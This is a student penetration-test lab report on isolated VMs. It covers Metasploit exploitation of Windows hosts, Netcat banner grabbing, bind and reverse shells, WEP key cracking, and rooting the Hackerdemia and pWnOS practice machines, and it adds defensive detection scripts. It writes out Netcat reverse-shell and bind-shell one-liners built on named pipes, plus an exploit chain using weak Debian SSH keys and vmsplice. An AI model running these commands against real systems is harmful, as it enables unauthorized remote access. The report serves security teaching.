Juan Ortega, [email protected]

Penetration Report [NTS330 – Unit 4 Penetration]

V1.0

Juan Ortega

3/6/2011


Document Properties

Title: Deviant Alert, Inc. Penetration Active Recon Report
Version: V1.0
Author: Juan Ortega
Pen-testers: Juan Ortega
Reviewed By:
Approved By:
Classification: Confidential

Version Control

Version | Date | Author | Description
V1.0 | March 7, 2011 | Juan Ortega | Final Draft

Disclaimer:

This penetration report is for educational purposes only. The penetration testing tools (enumeration, vulnerability scanning, and passive/active recon) were exercised within a private virtual network set up solely for the purpose of advancing my knowledge. Everything within this document is fictitious; any similarity to actual systems or organizations is purely coincidental.


1. Executive Summary

The active penetration attempts were a success. Metasploit was tested against a variety of operating systems: Windows XP SP1 and SP2, Windows Server 2003 R2, and Ubuntu. All but Ubuntu yielded a Meterpreter shell and a VNC view. Netcat was a simple and effective way to pass communication between two parties; as the Swiss Army knife of TCP, it offered a variety of functions and options to exercise. Wireless penetration was fast and easy: the captured IVs were cracked in a matter of seconds and the WEP key was recovered. Hackerdemia is bundled with holes and vulnerabilities, and penetrating that system was a cinch through a Netcat backdoor. Finally, pWnOS posed more of a challenge with only a few open ports, but weak SSH keys led to a login and from there to root privileges.


Table of Contents

1. Executive Summary --------------------------------------------------------------------------------------------- 3

Table of Illustrations ------------------------------------------------------------------------------------------------- 5

1.0 Project Objectives ------------------------------------------------------------------------------------------ 5

2.0 Timeline ------------------------------------------------------------------------------------------------------- 5

3.0 Summary of Findings -------------------------------------------------------------------------------------- 5

4.0 Summary of Recommendation -------------------------------------------------------------------------- 6

5.0 Detailed Findings ------------------------------------------------------------------------------------------- 7

5.1 Lab 1 – [Metasploit Lab] ---------------------------------------------------------------------------------- 7

5.1.1 Scope of Work -------------------------------------------------------------------------------------7

5.1.2 Assessment Guided Questions ---------------------------------------------------------------- 7

5.2 Lab 2 – [Netcat Lecture / Lab] ------------------------------------------------------------------------- 10

5.2.1 Scope of Work ----------------------------------------------------------------------------------- 10

5.2.2 Assumptions ------------------------------------------------------------------------------------- 10

5.2.3 Findings (Figures are located in Appendix) ----------------------------------------------- 10

5.3 Lab 3 – [Wireless Hacking Lab] ------------------------------------------------------------------------ 14

5.3.1 Scope of Work ----------------------------------------------------------------------------------- 14

5.3.2 Assumptions ------------------------------------------------------------------------------------- 14

5.3.3 Findings (Figures are located in Appendix) ----------------------------------------------- 14

5.4 Lab 4 – [Hackerdemia & pWnOS Lab] ---------------------------------------------------------------- 15

5.4.1 Scope of Work ----------------------------------------------------------------------------------- 15

5.4.2 Assumptions ------------------------------------------------------------------------------------- 15

5.4.3 Findings (Figures are located in Appendix) ----------------------------------------------- 15

6.0 Appendix ---------------------------------------------------------------------------------------------------- 18

7.0 References -------------------------------------------------------------------------------------------------- 24


Table of Illustrations

1.0 Project Objectives

1.1 The objectives are the following:

1.1.1 Download and install the Metasploit Framework to be used.

1.1.2 Work with Netcat, an introduction to the Swiss Army knife of TCP: grab banners from daemons, listen on open ports, and create a backdoor.

1.1.3 Discover wireless access points with WEP enabled and attempt to recover the key.

1.1.4 Download Hackerdemia and pWnOS and perform a penetration of both systems.

2.0 Timeline

The timeline of the test:

Penetration Testing | Start Date/Time | End Date/Time
Lab 1: Metasploit Framework | 4 March 2010 | 6 March 2010
Lab 2: Netcat Lecture / Lab | 4 March 2010 | 6 March 2010
Lab 3: Wireless Hacking Lab | 6 March 2010 | 6 March 2010
Lab 4: Hackerdemia & pWnOS Lab | 6 March 2010 | 6 March 2010

Table 1 Penetration Testing Timeline

3.0 Summary of Findings

3.1 Metasploit was very simple to install in /opt with no problems. After updating the framework and starting it, Nessus was loaded. A total of 4 VMs were tested in this penetration exercise, and all but one were exploited. Nessus was run first to scan for vulnerabilities; the report was then imported into Metasploit with 'db_import <name>.nessus' to check whether exploits were available for the individual vulnerabilities. Most matches gave positive results, and this method saves the hassle of specifying each exploit manually. In the end, only Ubuntu remained standing, because it is not as vulnerable as the Windows systems.

3.2 Netcat is a powerful yet simple Swiss Army knife. Reading banners, port scanning, printing port status, binding and listening verbosely, transferring files, binding a shell to a port, reverse shells, and port redirection: almost anything communication-wise, this tool can do. Newer versions of Netcat removed the '-e' argument for security reasons, but there is a way around it with a named pipe.

3.3 Although it was a burden not to have a wireless device that supported monitor mode, cracking the IVs was very simple. Aircrack-ng performed a PTW attack against the capture file and succeeded, while the FMS/KoreK method failed.

3.4 Hackerdemia is an extremely vulnerable system: a port scan alone revealed more than 26 open ports, all running outdated services, and a Nessus scan reported over 176 vulnerabilities. Surprisingly, none of the Metasploit exploits worked against Hackerdemia. In the end, a backdoor bound to port 1337 gave instant root access. pWnOS is a bit more secure than Hackerdemia, with only a handful of ports open. After spending some time analyzing PHP on Apache and Webmin without success, I gained root privileges through a weak SSH key followed by the vmsplice local root exploit.

4.0 Summary of Recommendation

4.1 When securing a system, always remember to run a vulnerability scanner at the end, just to make sure. Nessus and Metasploit together make penetration child's play; you want to give the attacker as hard a time as possible. All of the VMs tested need to be upgraded. The two Windows XP boxes need at least Service Pack 3, or Windows 7; Windows Server 2003 needs the latest Service Pack as well, or Windows Server 2008. Ubuntu also needs to be upgraded to version 10 or later. Just because penetrating Ubuntu was unsuccessful does not mean it is impossible; it only takes time. Even if Nessus returns few or no vulnerabilities, the system is only somewhat less susceptible, not secure.

4.2 It is very easy for attackers to create a backdoor using Netcat, and very easy for them to get past firewalls using redirection and reverse shells. On Windows, a utility called RootkitRevealer can be used to check for local rootkits. Good firewall policies, intrusion detection/prevention systems, and MAC address filtering can all be used to prevent backdoors more effectively. On Linux, the command 'ps -A | grep nc' checks for any Netcat process running in the background; 'netstat -l' lists listening sockets ('netstat -lnp' as root also shows the owning PID and program). Neither check catches a Netcat binary that has been renamed, so also compare the listening ports against the set of services the host is supposed to run.
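The allow-list check just described, as an added example that is not part of the original report: it runs over constructed 'netstat -lnp' output, flags one listener by its program name and another by an unexpected port, which is what catches a renamed Netcat, and notes listeners whose owner is hidden because netstat was not run as root. The expected-listener table and the sample lines are assumptions made up for the demo.

```python
"""Flag suspicious listening sockets in `netstat -lnp` output.

Added example for this report, not the author's commands. It shows why
`ps -A | grep nc` alone is weak (a renamed binary evades it) and what an
allow-list of expected listeners adds. Everything below is constructed
for the demo: the allow-list and the sample netstat lines are assumptions.
"""

# Program names that are almost never legitimate listeners on a server.
SUSPECT_PROGRAMS = {"nc", "netcat", "ncat", "nc.traditional", "nc.openbsd", "socat"}

# Assumed allow-list for the demo host: listening port -> expected program.
EXPECTED_LISTENERS = {22: "sshd", 80: "apache2", 3306: "mysqld"}

# Constructed sample of `netstat -lntp` output. 2410/crond on port 4444
# stands in for a Netcat binary renamed to evade a name-based check;
# the "-" on 3306 is what netstat prints when not run as root.
SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1044/apache2
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:1337            0.0.0.0:*               LISTEN      2301/nc
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      2410/crond
"""


def parse_netstat(text):
    """Parse `netstat -lnp` lines into dicts: proto, addr, port, pid, program."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        # Skip the banner and header lines; data lines start with tcp/udp.
        if len(parts) < 5 or not parts[0].startswith(("tcp", "udp")):
            continue
        addr, _, port = parts[3].rpartition(":")    # handles IPv6 ":::22" too
        pid, _, program = parts[-1].partition("/")  # "812/sshd" or "-"
        rows.append({
            "proto": parts[0],
            "addr": addr,
            "port": int(port),
            "pid": int(pid) if pid.isdigit() else None,
            "program": program or None,
        })
    return rows


def suspicious_listeners(text, expected=EXPECTED_LISTENERS):
    """Return [(port, program, [reasons])] for listeners worth a closer look."""
    findings = []
    for row in parse_netstat(text):
        program, port = row["program"], row["port"]
        reasons = []
        if program in SUSPECT_PROGRAMS:
            reasons.append("netcat-like program")
        if port not in expected:
            reasons.append("port not in allow-list")
        elif program and program != expected[port]:
            reasons.append("unexpected program on known port")
        if program is None:
            reasons.append("owner unknown (rerun as root)")
        if reasons:
            findings.append((port, program, reasons))
    return findings


if __name__ == "__main__":
    for port, program, reasons in suspicious_listeners(SAMPLE_NETSTAT):
        print(f"port {port:<5} {program or '?':<8} {', '.join(reasons)}")
```

The port-based rule is the one that matters: the 4444 listener has an innocent-looking name and would pass 'ps -A | grep nc', but it is not on the list of services this host is supposed to run.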


4.3 When a wireless access point is available, especially if the signal reaches outside the building, always have it encrypted with WPA2. WEP was never meant to be secure and can be cracked in minutes: from the packets in WeakIVs.zip gathered from the access point, it took only seconds to crack the 128-bit WEP key. In addition to WPA2, MAC filtering and disabling SSID broadcast can also be somewhat helpful, though neither stops an attacker who is sniffing the air. Finally, keep the wireless access point away from the internal network; set it up in the DMZ.

4.4 Hackerdemia and pWnOS are meant to be very vulnerable systems. The only recommendation is never to use them in production, and never to configure services the way these systems do.

5.0 Detailed Findings

5.1 Lab 1 – [Metasploit Lab]

5.1.1 Scope of Work

Download and install Metasploit Framework on a Slackware Linux system. Select targets from a variety of operating systems including: Windows XP SP1-2, Windows 2003 R2, and Ubuntu. Test exploits and workable payloads against the systems.

5.1.2 Assumptions

The target system 172.16.82.128 runs Windows XP SP1, which should reveal a multitude of available exploits to use against it. Windows XP SP2 will also be scanned for vulnerabilities and exploits, to recognize the major differences between the two service packs. In addition, penetration of Ubuntu and Windows Server 2003 will also be attempted.

5.1.2 Findings (Figures are located in Appendix)

[Windows XP SP1] – 172.16.82.128

5.1.2.1 Instead of specifically entering an exploit that Metasploit can use against Windows XP SP1, I wanted to utilize the db_import_nbe function. It works by importing a Nessus scan and letting Metasploit do the work of finding exploits that match the vulnerabilities. The process was simple and straightforward. I used the command 'db_autopwn -x -t' to list matching exploits. (db_autopwn has since been removed from the Metasploit Framework.)


Metasploit was able to find 6 Matching Exploit Modules:

ms03_026_dcom (CVE-2003-0352) BID-8205 OSVDB-2100

ms04_011_lsass (CVE-2003-0533) BID-10108 OSVDB-5248

ms06_040_netapi (CVE-2006-3439) BID-19409 OSVDB-27845

psexec (CVE-1999-0504) OSVDB-3106

ms06_040_netapi (CVE-2006-3439) BID-19409 OSVDB-27845

The ms06_040_netapi module was included twice.

Because db_import_nbe is deprecated, db_import was used instead.

Exploit used: msf->use exploit/windows/smb/ms06_040_netapi

Payload used: msf-exploit(ms06_040_netapi)> set PAYLOAD windows/meterpreter/bind_tcp

Payload tried                   Success?
windows/shell/bind_tcp          Yes
windows/vncinject/bind_tcp      Yes
windows/adduser                 Yes
windows/exec                    Yes

Some of the payloads left Windows in a stale state and prevented further exploits from running consecutively; a restart was needed after some of them executed.

[Windows XP SP2] – 172.16.82.129

5.1.2.2 Instead of specifically entering an exploit Metasploit can use against Windows

Get Matching exploits: msf-> db_autopwn -t -x

ms06_040_netapi (CVE-2006-3439) BID-19409 OSVDB-27845

psexec (CVE-1999-0504) OSVDB-3106

ms08_067_netapi (CVE-2008-4250) OSVDB-49243


Exploit used: msf->use exploit/windows/smb/ms08_067_netapi

Payload tried                   Success?
windows/meterpreter/bind_tcp    Yes
windows/shell/bind_tcp          Yes
windows/vncinject/bind_tcp      Yes
windows/adduser                 Yes
windows/exec                    Yes

The payloads ran more reliably than on Windows XP SP1, without problems or crashes and with no restarts at all. The user 'metasploit' was added to the target system.

[Windows Server 2003] – 172.16.82.134

5.1.2.3 A Nessus report scan was dumped into Metasploit as well.

Get Matching exploits: msf-> db_autopwn -t -x

psexec (CVE-1999-0504) OSVDB-3106

ms08_067_netapi (CVE-2008-4250) OSVDB-49243

Only two modules showed up.

Exploit used: msf->use exploit/windows/smb/ms08_067_netapi

Payload tried                   Success?
windows/meterpreter/bind_tcp    Yes
windows/shell/bind_tcp          No
windows/vncinject/bind_tcp      No
windows/adduser                 No
windows/exec                    No

The SMB service on Server 2003 seems less stable than on Windows XP SP2: the first meterpreter attempt succeeded, but it appears the service crashed afterward, since none of the other payloads worked. A restart might have been needed, as with Windows XP SP1.

[Ubuntu] – 172.16.82.132

5.1.2.4 A Nessus report scan was dumped into Metasploit as well.

Get Matching exploits: msf-> db_autopwn -t -x


psexec (CVE-1999-0504) OSVDB-3106

Only one module matched, because of the SMB/CIFS service exposed by the default Samba installation.

Exploit used: msf->use exploit/windows/smb/psexec

Payload tried                   Success?
windows/meterpreter/bind_tcp    No
windows/shell/bind_tcp          No
windows/vncinject/bind_tcp      No
windows/adduser                 No
generic/shell_bind_tcp          No
windows/exec                    No

None of the payloads worked because psexec is not really an exploit: it needs a valid username and password to log into Samba, and the payloads would probably have worked with them. I could have gone on to try to obtain credentials, but that is beyond the scope of this exercise.

5.2 Lab 2 – [Netcat Lecture / Lab]

5.2.1 Scope of Work

An introduction to Netcat would consist of basic commands: grab Headers from daemons, listen verbosely to a port, bind a shell, connect to ports, and a few others.

5.2.2 Assumptions

Using Netcat before would make the lab simple. Nothing unusual will occur.

5.2.3 Findings (Figures are located in Appendix)

5.2.3.1 Grab the Banner

$ nc -v -w 1 172.16.82.132 22 > /tmp/bannergrab

This is a very simple command to grab the banner from a system running SSH; the same arguments can be used for any service that talks first. What comes back from port 22 is the SSH protocol identification string, of the form "SSH-2.0-<software version>", which names the server software. It is not /etc/motd: that file is printed only after a successful login, and sshd's Banner option is shown only to real SSH clients during authentication.


5.2.3.2 Verify an open port

I am going to verify the obvious, whether port 80 is open on the same target system running Ubuntu.

$ nc -zv 172.16.82.132 80

(UNKNOWN) [172.16.82.132] 80 (http) open

Using the 'z' (zero-I/O scan) and 'v' (verbose) arguments, I was able to see the status of the port, whether closed or open; it was reported open and listening.

5.2.3.3 Grab a HEAD

$ nc 172.16.82.132 80

HEAD / HTTP/1.0

The request line is followed by an empty line (press Enter twice). The command outputs the response headers of Apache; the Server header names the version. The request needs a real protocol version (HTTP/1.0, not HTTP/0.1) and the terminating empty line, otherwise the server keeps waiting for more headers. The one-liner "nc 172.16.82.132 80 < /bin/echo 'HTTP / HTTP/0.1'" did not work because '<' redirects the /bin/echo binary itself as input instead of running it; piping a correct request does work:

$ printf 'HEAD / HTTP/1.0\r\n\r\n' | nc 172.16.82.132 80

5.2.3.4 Verbosely listen to a port, and have another connection send a string of text.

Computer 1:

$ nc -l 1337

Computer 2:

$ echo "Hello World" > output_file.txt

$ nc 172.16.82.132 1337 < output_file.txt

The same commands can be used to send files, since output_file.txt is a file itself. Computer 1, however, needs '> output_file.txt' at the end to receive it; otherwise the output goes to stdout, which is the terminal.

5.2.3.5 Transfer a file called transfer.txt to a listening port.

Computer 1:


$ nc -l 1337 > transfer.txt

As stated in the last exercise, this is a simple process; the only difference is that the listening computer redirects its output to a file.

5.2.3.6 Send transfer.txt

Computer 2:

$ echo "Transfer Me" > transfer.txt

$ nc 172.16.82.132 1337 < transfer.txt

The file transfer.txt is fed into the Netcat connection, and since the listening side writes the received bytes to a local file, the process simply transfers a file. Nothing on the wire is encrypted or authenticated: whoever connects to port 1337 first gets to write transfer.txt.

5.2.3.7 Bind a shell to a port with Netcat.

Option 1 (legacy versions that still have -e):

$ nc -l -p 1337 -e /bin/sh

Option 2 (new versions without -e):

$ mkfifo /tmp/pipe

$ sh </tmp/pipe 2>&1 | nc -l 1337 >/tmp/pipe

The Ubuntu system had a recent (OpenBSD-derived) version of Netcat, which means the '-e' argument used to bind a program to a port is gone. The way around it is a named pipe: Netcat writes whatever it receives into the FIFO, the shell reads its commands from the FIFO, and the shell's output (stdout and stderr, hence 2>&1) is piped back into Netcat. It works just the same. Traditional Netcat needs '-p' before the listening port; the OpenBSD version takes the port directly.

5.2.3.8 Connect to the system with the shell binded to a port.

$ nc 172.16.82.132 1337

ls

Desktop

Documents


Downloads

Connecting to a backdoor would give the user an instant shell.

5.2.3.9 Create a reverse shell

User (me):

$ nc -lv 1337

On the target machine:

Option 1 (legacy versions):

$ nc -e /bin/sh <My IP> 1337

Option 2 (new versions):

$ mkfifo /tmp/pipe

$ sh </tmp/pipe 2>&1 | nc <My IP> 1337 >/tmp/pipe

The user creates a listening port, 1337. The target computer then connects out to it, the reverse of the bind shell, which is what gets through a firewall that blocks inbound connections but allows outbound ones. Option 2 is for newer Netcat versions; in both options the connection must go to the listener's address, not to localhost.

5.2.3.10 Redirection is very similar to daisy-chaining SSH connections or using an SSH tunnel. Say a target system is running Apache behind a firewall that filters packets. One way to reach it is to set up an SSH tunnel from localhost:<port> to target:<port>, which gets past the firewall. Netcat can do something similar, though unencrypted unless you use cryptcat or wrap it in openssl, and not in the same way: one Netcat listens on a port, whatever it receives is piped into a second Netcat that connects to the target port, and the target's replies come back through a named pipe; sort of like a tunnel. Netcat does not execute the relayed data; it only copies bytes between the two sockets.


5.3 Lab 3 – [Wireless Hacking Lab]

5.3.1 Scope of Work

Develop a basic understanding of hacking wireless access points. WEP keys are easier to crack than WPA2, so it should be interesting to see whether the key can be retrieved.

5.3.2 Assumptions

Lacking the necessary equipment to attack wireless access points makes this exercise difficult. A wireless card would need to support 'monitor' mode (set through 'iwconfig') in order to capture traffic; for this lab I will therefore use the capture in the zip file provided.

5.3.3 Findings (Figures are located in Appendix)

5.3.3.1 Wardriving is the act of driving through neighborhoods, cities, or passageways to locate and analyze wireless access points, gathering as much information as possible and, ideally, explaining the situation to the would-be victim. Scanning for wireless networks around a place is not a heavy task; all that is needed is an antenna and the right software tools.

5.3.3.2 Tools to detect the presence of wireless networks:

iwlist

wifi-radar

Kismet

NetStumbler

Aircrack

Airsnort

5.3.3.3 Any of the tools listed above will reveal the SSID and BSSID of a wireless access point. Even if a user hides the SSID, the access point's presence can still be detected.

5.3.3.4 The service set identifier (SSID) is the name used to tell wireless networks apart. It is not technically necessary to know it, since most access points can be configured to conceal the SSID from their beacons. Just like a DNS name, the SSID is only for humans; all a system needs to find the access point is its MAC address, which is the BSSID and is present in every frame the access point sends, hidden SSID or not.

5.3.3.5 FMS stands for the Fluhrer, Mantin, and Shamir attack on RC4, which exploits weak IVs when the IV is prepended to the key, as WEP does.

5.3.3.6 Crack the WEP key provided in WeakIVs.zip

$ unzip WeakIVs.zip

$ aircrack-ng -b 00:1E:52:F6:A0:9B weakivs-02.ivs

KEY FOUND! [0B:4E:D3:F6:7C:C5:40:FE:98:36:BA:A6:52]

Decrypted correctly: 100%

Adding '-K' to select the FMS/KoreK method did not succeed; only the default PTW method recovered the key. PTW works on ARP request/reply packets, and the capture contained enough of them. The 13-byte key shown is a 104-bit secret; it is marketed as "128-bit WEP" because the 24-bit IV is counted in.
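An added illustration, not the report's aircrack-ng run and not an implementation of PTW or FMS: the RC4 keystream reuse that makes WEP crackable. The key used is the one recovered above; the IV and frame payloads are constructed. Every WEP-encrypted ARP frame starts with the same LLC/SNAP bytes, so one frame gives away the keystream for its IV, and any other frame under that IV decrypts for free; PTW and FMS go further and turn many such IV/keystream pairs into the key itself, which is why ARP traffic is what aircrack-ng wants.

```python
"""Why WEP's keystream leaks: RC4 with a 24-bit IV prepended to the key.

Added example for this report. It is not aircrack-ng and does not implement
PTW or FMS; it shows the known-plaintext/keystream-reuse property those
attacks build on. The key is the one the report recovered; the IV and
frame bodies are constructed for the demo.
"""
import math


def rc4_keystream(key, length):
    """Plain RC4: key-scheduling (KSA) then keystream generation (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # KSA
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                    # PRGA
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key, iv, plaintext):
    """WEP's per-packet key is IV || shared key, and the IV is sent in clear.
    Returns iv || ciphertext (the CRC-32 ICV is left out; it changes nothing here)."""
    assert len(iv) == 3, "WEP IVs are 24 bits"
    return iv + xor(plaintext, rc4_keystream(iv + wep_key, len(plaintext)))


# Every WEP-encrypted ARP frame starts with this LLC/SNAP header: known plaintext.
ARP_SNAP = bytes.fromhex("aaaa030000000806")


def recover_keystream(frame, known_prefix=ARP_SNAP):
    """ciphertext XOR known plaintext = keystream for this frame's IV."""
    iv, ct = frame[:3], frame[3:]
    return iv, xor(ct[: len(known_prefix)], known_prefix)


def decrypt_prefix(frame, keystream):
    """Decrypt as many leading bytes of a frame as there is keystream for."""
    return xor(frame[3 : 3 + len(keystream)], keystream)


def iv_repeat_estimate(iv_bits=24):
    """Birthday bound: frames sent before a random IV is expected to repeat."""
    return int(math.sqrt(math.pi / 2 * 2 ** iv_bits))


if __name__ == "__main__":
    key = bytes.fromhex("0B4ED3F67CC540FE9836BAA652")   # recovered above (13 bytes)
    iv = bytes.fromhex("010203")                           # constructed
    frame_a = wep_encrypt(key, iv, ARP_SNAP + b"\x00\x01\x08\x00\x06\x04\x00\x01")
    frame_b = wep_encrypt(key, iv, ARP_SNAP + b"\x00\x01\x08\x00\x06\x04\x00\x02")
    _, ks = recover_keystream(frame_a)
    print("keystream for IV", iv.hex(), "=", ks.hex())
    print("frame B decrypts to", decrypt_prefix(frame_b, ks).hex())
    print("expect an IV repeat after about", iv_repeat_estimate(), "frames")
```

With only 2^24 IVs, a busy access point is expected to reuse one after a few thousand frames, and many drivers of the era simply counted up from zero; the real attacks do not even need a repeat, since each ARP frame already hands over the first keystream bytes for its IV together with the IV itself.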

5.4 Lab 4 – [Hackerdemia & pWnOS Lab]

5.4.1 Scope of Work

The scope of this exercise consists of compromising the Hackerdemia and pWnOS systems. These are deliberately very vulnerable systems that should be easy to exploit.

5.4.2 Assumptions

Hackerdemia should be easier to get into than pWnOS. Hopefully both have many old daemon services running to compromise and will return promising Nessus scan reports. Using Metasploit, Netcat, and Nmap, compromising these systems should be easy.

5.4.3 Findings (Figures are located in Appendix)

[Hackerdemia]

5.4.3.1 Hackerdemia is set up as a VM and running.

5.4.3.2 I have compromised Hackerdemia.

5.4.3.3 After failing with Metasploit, I turned to Nmap and found a wealth of open ports. I noted that one of them, port 1337, was labelled "Elite", which reminded me of the port Netcat is commonly used with as a backdoor. I connected to the system.


$ nc 172.16.82.135 1337

whoami

root

Root access has been obtained.

5.4.3.4 Tools used:

1. Nessus reported many ports and vulnerabilities in Hackerdemia, with 11 high-risk holes, 9 of them in Apache.

2. Importing the Nessus scan into Metasploit was surprising: only 4 matching modules were found:

linux/samba/lsa_transnames_heap (CVE-2007-2446)

osx/samba/lsa_transnames_heap (CVE-2007-2446)

psexec (CVE-2007-2446)

windows/http/apache_mod_rewrite_ldap (CVE-2006-3747)

None of the exploits worked, despite 26 open ports and 176 total vulnerabilities in the Nessus scan.

3. Nmap returned a substantial amount of information and revealed how vulnerable the daemons really are. Most of them were old and outdated, leaving plenty to explore.

4. Netcat was used to connect to several open ports in search of a backdoor or header information. I succeeded in finding a backdoor on port 1337 (Elite).

5.4.3.5 If I find a backdoor on a production web server, someone is not doing their job. This would be an indication to step up security, turn the web server into a bastion host, and completely harden the network and system.


[pWnOS]

5.4.3.6 pWnOS has been started on the machine. I ran into a problem with the network; it turns out you must press the "I moved" button the first time pWnOS boots so that it does not change its MAC address.

5.4.3.7 Analysis conducted.

1. The first thing was to try Nessus and Metasploit for any known exploit that could compromise the system right away. Metasploit returned the psexec module, but it did not work.

2. The second attempt was to port scan the system for services. Nmap returned ports 22, 80, 139, 445 and 10000 open. I took time analyzing Apache (80) and Webmin (10000) by running a web vulnerability scanner against them, and some promising results appeared.

Apache was running phpMyAdmin 2.6.3-pl1 at /php/phpMyAdmin. I tried every exploit I could find for it; the only matching one required a login.

Nikto returned a hit against Webmin for CVE-2003-1553 (OSVDB-44056), described as: "Haakon Nilsen Simple Internet Publishing System (SIPS) 0.2.2 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain password and other user information via a direct request to a user-specific configuration directory." The path it checks is:

/sips/sipssys/users/a/admin/user

That CVE describes SIPS, not Webmin, so the hit is a path-based signature match rather than a confirmed Webmin flaw.

3. Giving up on PHP, I downloaded the Webmin Arbitrary File Disclosure Exploit and was able to read any file on the remote system.

4. The only high-severity vulnerability Nessus returned was weak keys in the SSH daemon (CVE-2008-0166, the Debian OpenSSL predictable PRNG). I therefore downloaded debian_ssh_rsa_2048_x86.tar.bz2, the precomputed set of weak 2048-bit RSA keys.

5. Using Webmin, I grabbed the SSH public keys of the users obama and yomama. I ran 'grep -lr <Key> *.pub' against the Debian RSA key set and found a match for both. Then I got access with 'ssh -i <key> [email protected]', where <key> is the private half of the matching precomputed pair.


6. Next I downloaded the vmsplice local root exploit and compiled it. I transferred the binary to pWnOS using 'scp -i <key> <binary> [email protected]:~'.

7. Executed vmsplice and attained root access.

5.4.3.8-9 I have used the vmsplice Local Root exploit on pWnOS to obtain root privileges.

5.4.3.10 Exploits used:

Exploit tried                                                  Success?
phpMyAdmin 2.6.3-pl1                                           No
phpMyAdmin 2.5.7 Remote Code Injection Exploit                 No
phpMyAdmin 2.6.4-pl1 Remote Directory Traversal Exploit        No
phpMyAdmin 3.1.0 (XSRF) SQL Injection Vulnerability            No
phpMyAdmin Config File Code Injection                          No
Apache (mod_rewrite) Remote Overflow PoC                       No
Webmin Arbitrary File Disclosure Exploit                       Yes
Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit     Yes
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit         Yes
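Step 5 of the pWnOS analysis matches the target's public keys against the precomputed Debian weak-key set with grep. As an added example (not the report's commands), the following parses authorized_keys lines, decodes the ssh-rsa wire format to get the modulus size and an OpenSSH-style SHA256 fingerprint, and matches by fingerprint against a blacklist, which is what ssh-vulnkey did on the defending side. The keys and blacklist here are constructed (the moduli are made-up numbers, not real keys); in practice the blacklist is built from the precomputed key set.

```python
"""Match authorized_keys entries against a set of known-weak public keys.

Added example for this report, not the author's grep. It decodes the
OpenSSH "ssh-rsa" public key format (RFC 4253 string/mpint encoding),
reports the modulus size and the SHA256 fingerprint, and flags keys whose
fingerprint is in a blacklist. The keys and the blacklist below are
constructed for the demo; the moduli are made-up numbers, not real keys.
"""
import base64
import hashlib
import struct


def _ssh_string(b):
    return struct.pack(">I", len(b)) + b


def _ssh_mpint(x):
    """Positive mpint: big-endian, minimal, with a leading zero if the top bit is set."""
    return _ssh_string(x.to_bytes((x.bit_length() + 8) // 8, "big"))


def _read_string(blob, off):
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n


def build_rsa_pubkey(e, n, comment):
    """Encode (e, n) as an authorized_keys line, the way ssh-keygen would."""
    blob = _ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)
    return f"ssh-rsa {base64.b64encode(blob).decode()} {comment}"


def fingerprint(blob):
    """OpenSSH-style SHA256 fingerprint: base64 without padding."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_rsa_pubkey(line):
    """Parse one 'ssh-rsa AAAA... comment' line; returns None for other lines."""
    parts = line.split()
    if len(parts) < 2 or parts[0] != "ssh-rsa":
        return None  # comments, blank lines, other key types, option-prefixed lines
    blob = base64.b64decode(parts[1])
    ktype, off = _read_string(blob, 0)
    if ktype != b"ssh-rsa":
        raise ValueError("key type in blob does not match prefix")
    e_bytes, off = _read_string(blob, off)
    n_bytes, off = _read_string(blob, off)
    n = int.from_bytes(n_bytes, "big")
    return {
        "bits": n.bit_length(),
        "e": int.from_bytes(e_bytes, "big"),
        "fingerprint": fingerprint(blob),
        "comment": parts[2] if len(parts) > 2 else "",
    }


def find_weak_keys(authorized_keys_text, blacklist):
    """Return (comment, bits, fingerprint) for every key in the blacklist."""
    hits = []
    for line in authorized_keys_text.splitlines():
        key = parse_rsa_pubkey(line)
        if key and key["fingerprint"] in blacklist:
            hits.append((key["comment"], key["bits"], key["fingerprint"]))
    return hits


# Constructed demo data: two made-up 2048-bit moduli; the first plays the weak one.
WEAK_N = (1 << 2047) | 0x5EED          # stand-in for a predictable-PRNG modulus
GOOD_N = (1 << 2047) | 0xC0FFEE        # stand-in for a properly generated one
WEAK_LINE = build_rsa_pubkey(65537, WEAK_N, "obama@pWnOS")
GOOD_LINE = build_rsa_pubkey(65537, GOOD_N, "yomama@pWnOS")
SAMPLE_AUTHORIZED_KEYS = "# constructed sample\n" + WEAK_LINE + "\n" + GOOD_LINE + "\n"
# In practice: the fingerprint of every key in the precomputed weak-key set.
SAMPLE_BLACKLIST = {parse_rsa_pubkey(WEAK_LINE)["fingerprint"]}


if __name__ == "__main__":
    for comment, bits, fp in find_weak_keys(SAMPLE_AUTHORIZED_KEYS, SAMPLE_BLACKLIST):
        print(f"WEAK {comment} ({bits}-bit) {fp}")
```

Matching on the decoded blob rather than on a substring of the base64 text avoids false hits from partial matches and tells you the key size, which is what decides which precomputed set (rsa 1024, 2048, 4096) the matching private key lives in.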

6.0 Appendix

6.1 Lab 1 – [Metasploit Lab]

5.1.2.1– Windows XP SP1

5.1.2.2 - Windows XP SP2


5.1.2.3– Windows 2003 R2

5.1.2.4- Ubuntu

6.2 Lab 2 – [Netcat lecture / lab]

5.2.3.1


5.2.3.2

5.2.3.3

5.2.3.4

5.2.3.5


5.2.3.6

5.2.3.9

6.3 Lab 3 – [Wireless Hacking Lab]

5.3.3.6


6.4 Lab 4 – [Hackerdemia & pWnOS Lab]

5.4.3.3 - Nmap Scan hackerdemia


5.4.3.4

5.4.3.7– Nikto Scan


5.4.3.8-9

7.0 References

